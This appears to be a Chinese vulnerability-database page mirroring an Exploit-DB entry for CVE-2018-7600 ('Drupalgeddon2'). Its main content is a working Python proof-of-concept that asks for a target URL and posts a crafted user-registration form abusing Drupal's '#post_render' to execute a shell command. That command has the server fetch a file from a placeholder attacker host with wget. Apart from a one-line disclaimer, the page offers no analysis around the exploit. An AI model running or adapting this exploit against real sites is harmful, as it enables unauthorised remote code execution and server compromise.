漏洞概要

漏洞标题:
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 – 'Drupalgeddon2' Remote Code Execution (PoC)

提交时间:
2018-04-13

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 18 人关注

漏洞详情

EDB-ID: 44448 Author: Vitalii Rudnykh Published: 2018-04-13
CVE:
CVE-2018-7600
Type: Webapps Platform: PHP
Aliases:
N/A
Advisory/Source: Link Tags:
N/A

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
#!/usr/bin/env
import sys
import requests

print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

target = raw_input('Enter target url (example: https://domain.ltd/): ')

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}

r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

发表评论

电子邮件地址不会被公开。 必填项已用*标注